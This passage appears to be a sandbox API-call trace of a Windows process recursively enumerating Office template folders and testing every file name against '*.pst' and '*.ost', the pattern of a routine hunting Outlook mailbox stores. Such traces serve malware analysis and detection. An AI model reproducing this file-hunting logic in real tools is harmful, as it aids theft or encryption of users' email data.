[0251.312] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.312] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.312] PathMatchSpecW (pszFile="TM03457475[[fn=Frame]].thmx", pszSpec="*.pst") returned 0 [0251.312] PathMatchSpecW (pszFile="TM03457475[[fn=Frame]].thmx", pszSpec="*.ost") returned 0 [0251.312] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.312] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.312] PathMatchSpecW (pszFile="TM03457485[[fn=Mesh]].thmx", pszSpec="*.pst") returned 0 [0251.312] PathMatchSpecW (pszFile="TM03457485[[fn=Mesh]].thmx", pszSpec="*.ost") returned 0 [0251.312] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.312] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.312] PathMatchSpecW (pszFile="TM03457491[[fn=Metropolitan]].thmx", pszSpec="*.pst") returned 0 [0251.312] PathMatchSpecW (pszFile="TM03457491[[fn=Metropolitan]].thmx", pszSpec="*.ost") returned 0 [0251.312] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.312] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.313] PathMatchSpecW (pszFile="TM03457496[[fn=Parallax]].thmx", pszSpec="*.pst") returned 0 [0251.313] PathMatchSpecW (pszFile="TM03457496[[fn=Parallax]].thmx", pszSpec="*.ost") returned 0 [0251.313] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.313] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.313] PathMatchSpecW (pszFile="TM03457503[[fn=Quotable]].thmx", pszSpec="*.pst") returned 0 [0251.313] PathMatchSpecW (pszFile="TM03457503[[fn=Quotable]].thmx", pszSpec="*.ost") returned 0 [0251.313] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.313] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.313] PathMatchSpecW (pszFile="TM03457510[[fn=Savon]].thmx", pszSpec="*.pst") returned 0 [0251.313] PathMatchSpecW (pszFile="TM03457510[[fn=Savon]].thmx", pszSpec="*.ost") returned 0 [0251.313] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.313] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.313] PathMatchSpecW (pszFile="TM03457515[[fn=View]].thmx", pszSpec="*.pst") returned 0 [0251.313] PathMatchSpecW (pszFile="TM03457515[[fn=View]].thmx", pszSpec="*.ost") returned 0 [0251.313] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.313] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.313] PathMatchSpecW (pszFile="TM04033917[[fn=Berlin]].thmx", pszSpec="*.pst") returned 0 [0251.313] PathMatchSpecW (pszFile="TM04033917[[fn=Berlin]].thmx", pszSpec="*.ost") returned 0 [0251.313] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.313] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.313] PathMatchSpecW (pszFile="TM04033919[[fn=Circuit]].thmx", pszSpec="*.pst") returned 0 [0251.313] PathMatchSpecW (pszFile="TM04033919[[fn=Circuit]].thmx", pszSpec="*.ost") returned 0 [0251.313] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.313] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.313] PathMatchSpecW (pszFile="TM04033921[[fn=Damask]].thmx", pszSpec="*.pst") returned 0 [0251.313] PathMatchSpecW (pszFile="TM04033921[[fn=Damask]].thmx", pszSpec="*.ost") returned 0 [0251.313] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.313] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.313] PathMatchSpecW (pszFile="TM04033925[[fn=Droplet]].thmx", pszSpec="*.pst") returned 0 [0251.313] PathMatchSpecW (pszFile="TM04033925[[fn=Droplet]].thmx", pszSpec="*.ost") returned 0 [0251.313] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.313] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.313] PathMatchSpecW (pszFile="TM04033927[[fn=Main Event]].thmx", pszSpec="*.pst") returned 0 [0251.313] PathMatchSpecW (pszFile="TM04033927[[fn=Main Event]].thmx", pszSpec="*.ost") returned 0 [0251.313] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.313] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.313] PathMatchSpecW (pszFile="TM04033929[[fn=Slate]].thmx", pszSpec="*.pst") returned 0 [0251.313] PathMatchSpecW (pszFile="TM04033929[[fn=Slate]].thmx", pszSpec="*.ost") returned 0 [0251.313] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.314] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.314] PathMatchSpecW (pszFile="TM04033937[[fn=Vapor Trail]].thmx", pszSpec="*.pst") returned 0 [0251.314] PathMatchSpecW (pszFile="TM04033937[[fn=Vapor Trail]].thmx", pszSpec="*.ost") returned 0 [0251.314] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.314] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.314] PathMatchSpecW (pszFile="TM10001103[[fn=Headlines]].thmx", pszSpec="*.pst") returned 0 [0251.314] PathMatchSpecW (pszFile="TM10001103[[fn=Headlines]].thmx", pszSpec="*.ost") returned 0 [0251.314] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.314] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.314] PathMatchSpecW (pszFile="TM10001104[[fn=Feathered]].thmx", pszSpec="*.pst") returned 0 [0251.314] PathMatchSpecW (pszFile="TM10001104[[fn=Feathered]].thmx", pszSpec="*.ost") returned 0 [0251.314] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.314] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.314] PathMatchSpecW (pszFile="TM10001105[[fn=Crop]].thmx", pszSpec="*.pst") returned 0 [0251.314] PathMatchSpecW (pszFile="TM10001105[[fn=Crop]].thmx", pszSpec="*.ost") returned 0 [0251.314] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.314] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.314] PathMatchSpecW (pszFile="TM10001106[[fn=Badge]].thmx", pszSpec="*.pst") returned 0 [0251.314] PathMatchSpecW (pszFile="TM10001106[[fn=Badge]].thmx", pszSpec="*.ost") returned 0 [0251.314] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.314] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.314] PathMatchSpecW (pszFile="TM10001114[[fn=Gallery]].thmx", pszSpec="*.pst") returned 0 [0251.314] PathMatchSpecW (pszFile="TM10001114[[fn=Gallery]].thmx", pszSpec="*.ost") returned 0 [0251.314] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.314] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.314] PathMatchSpecW (pszFile="TM10001115[[fn=Parcel]].thmx", pszSpec="*.pst") returned 0 [0251.314] PathMatchSpecW (pszFile="TM10001115[[fn=Parcel]].thmx", pszSpec="*.ost") returned 0 [0251.314] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 0 [0251.314] FindClose (in: hFindFile=0x5c10990 | out: hFindFile=0x5c10990) returned 1 [0251.315] FindNextFileW (in: hFindFile=0x5c0f310, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0 [0251.315] FindClose (in: hFindFile=0x5c0f310 | out: hFindFile=0x5c0f310) returned 1 [0251.315] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0251.315] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.315] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="SmartArt Graphics" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics" [0251.315] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*" [0251.315] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*", lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0x4406e00 [0251.353] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.353] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 1 [0251.353] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.353] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 1 [0251.353] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.353] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics", pszFile="1033" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033" [0251.353] PathCombineW (in: pszDest=0x235cff0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*" [0251.353] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*", lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 0x44067a0 [0251.373] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.373] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.374] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.374] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.374] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.374] PathMatchSpecW (pszFile="TM03328884[[fn=architecture]].glox", pszSpec="*.pst") returned 0 [0251.374] PathMatchSpecW (pszFile="TM03328884[[fn=architecture]].glox", pszSpec="*.ost") returned 0 [0251.374] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.374] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.374] PathMatchSpecW (pszFile="TM03328893[[fn=BracketList]].glox", pszSpec="*.pst") returned 0 [0251.375] PathMatchSpecW (pszFile="TM03328893[[fn=BracketList]].glox", pszSpec="*.ost") returned 0 [0251.375] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.375] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.375] PathMatchSpecW (pszFile="TM03328905[[fn=Chevron Accent]].glox", pszSpec="*.pst") returned 0 [0251.375] PathMatchSpecW (pszFile="TM03328905[[fn=Chevron Accent]].glox", pszSpec="*.ost") returned 0 [0251.375] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.375] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.375] PathMatchSpecW (pszFile="TM03328908[[fn=Circle Process]].glox", pszSpec="*.pst") returned 0 [0251.375] PathMatchSpecW (pszFile="TM03328908[[fn=Circle Process]].glox", pszSpec="*.ost") returned 0 [0251.375] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.375] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.375] PathMatchSpecW (pszFile="TM03328916[[fn=Converging Text]].glox", pszSpec="*.pst") returned 0 [0251.375] PathMatchSpecW (pszFile="TM03328916[[fn=Converging Text]].glox", pszSpec="*.ost") returned 0 [0251.375] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.375] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.375] PathMatchSpecW (pszFile="TM03328919[[fn=Hexagon Radial]].glox", pszSpec="*.pst") returned 0 [0251.375] PathMatchSpecW (pszFile="TM03328919[[fn=Hexagon Radial]].glox", pszSpec="*.ost") returned 0 [0251.375] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.375] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.375] PathMatchSpecW (pszFile="TM03328925[[fn=Interconnected Block Process]].glox", pszSpec="*.pst") returned 0 [0251.375] PathMatchSpecW (pszFile="TM03328925[[fn=Interconnected Block Process]].glox", pszSpec="*.ost") returned 0 [0251.375] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.375] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.375] PathMatchSpecW (pszFile="TM03328932[[fn=Picture Frame]].glox", pszSpec="*.pst") returned 0 [0251.375] PathMatchSpecW (pszFile="TM03328932[[fn=Picture Frame]].glox", pszSpec="*.ost") returned 0 [0251.375] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.375] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.375] PathMatchSpecW (pszFile="TM03328935[[fn=Picture Organization Chart]].glox", pszSpec="*.pst") returned 0 [0251.375] PathMatchSpecW (pszFile="TM03328935[[fn=Picture Organization Chart]].glox", pszSpec="*.ost") returned 0 [0251.376] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.376] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.376] PathMatchSpecW (pszFile="TM03328940[[fn=Radial Picture List]].glox", pszSpec="*.pst") returned 0 [0251.376] PathMatchSpecW (pszFile="TM03328940[[fn=Radial Picture List]].glox", pszSpec="*.ost") returned 0 [0251.376] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.376] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.376] PathMatchSpecW (pszFile="TM03328951[[fn=Tabbed Arc]].glox", pszSpec="*.pst") returned 0 [0251.376] PathMatchSpecW (pszFile="TM03328951[[fn=Tabbed Arc]].glox", pszSpec="*.ost") returned 0 [0251.376] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.376] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.376] PathMatchSpecW (pszFile="TM03328972[[fn=Tab List]].glox", pszSpec="*.pst") returned 0 [0251.376] PathMatchSpecW (pszFile="TM03328972[[fn=Tab List]].glox", pszSpec="*.ost") returned 0 [0251.376] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.376] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.376] PathMatchSpecW (pszFile="TM03328975[[fn=Theme Picture Accent]].glox", pszSpec="*.pst") returned 0 [0251.376] PathMatchSpecW (pszFile="TM03328975[[fn=Theme Picture Accent]].glox", pszSpec="*.ost") returned 0 [0251.376] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.376] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.376] PathMatchSpecW (pszFile="TM03328983[[fn=Theme Picture Alternating Accent]].glox", pszSpec="*.pst") returned 0 [0251.376] PathMatchSpecW (pszFile="TM03328983[[fn=Theme Picture Alternating Accent]].glox", pszSpec="*.ost") returned 0 [0251.376] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.376] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.376] PathMatchSpecW (pszFile="TM03328986[[fn=Theme Picture Grid]].glox", pszSpec="*.pst") returned 0 [0251.376] PathMatchSpecW (pszFile="TM03328986[[fn=Theme Picture Grid]].glox", pszSpec="*.ost") returned 0 [0251.376] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.376] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.376] PathMatchSpecW (pszFile="TM03328990[[fn=Varying Width List]].glox", pszSpec="*.pst") returned 0 [0251.376] PathMatchSpecW (pszFile="TM03328990[[fn=Varying Width List]].glox", pszSpec="*.ost") returned 0 [0251.376] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.376] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.377] PathMatchSpecW (pszFile="TM03328998[[fn=Rings]].glox", pszSpec="*.pst") returned 0 [0251.377] PathMatchSpecW (pszFile="TM03328998[[fn=Rings]].glox", pszSpec="*.ost") returned 0 [0251.377] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 0 [0251.377] FindClose (in: hFindFile=0x44067a0 | out: hFindFile=0x44067a0) returned 1 [0251.377] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0 [0251.378] FindClose (in: hFindFile=0x4406e00 | out: hFindFile=0x4406e00) returned 1 [0251.378] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0 [0251.378] FindClose (in: hFindFile=0x5c0f2b0 | out: hFindFile=0x5c0f2b0) returned 1 [0251.378] FindNextFileW (in: hFindFile=0x5c0efb0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0251.378] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.378] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="User" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" [0251.378] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*" [0251.378] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x44067a0 [0251.378] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.378] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0251.378] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.378] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0251.378] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.378] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", pszFile="Document Themes" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" [0251.378] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*" [0251.378] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*", lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0x4406a40 [0251.379] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.379] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 1 [0251.379] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.379] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 1 [0251.379] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.379] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", pszFile="1033" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" [0251.379] PathCombineW (in: pszDest=0x235cff0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*" [0251.379] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*", lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 0x4406e00 [0251.379] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.379] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.379] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.379] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 0 [0251.379] FindClose (in: hFindFile=0x4406e00 | out: hFindFile=0x4406e00) returned 1 [0251.379] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0 [0251.379] FindClose (in: hFindFile=0x4406a40 | out: hFindFile=0x4406a40) returned 1 [0251.379] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0251.379] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.380] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", pszFile="SmartArt Graphics" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics" [0251.380] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\*" [0251.380] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\*", lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0x4406a40 [0251.380] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.380] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 1 [0251.380] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.380] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 1 [0251.380] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.380] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics", pszFile="1033" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033") 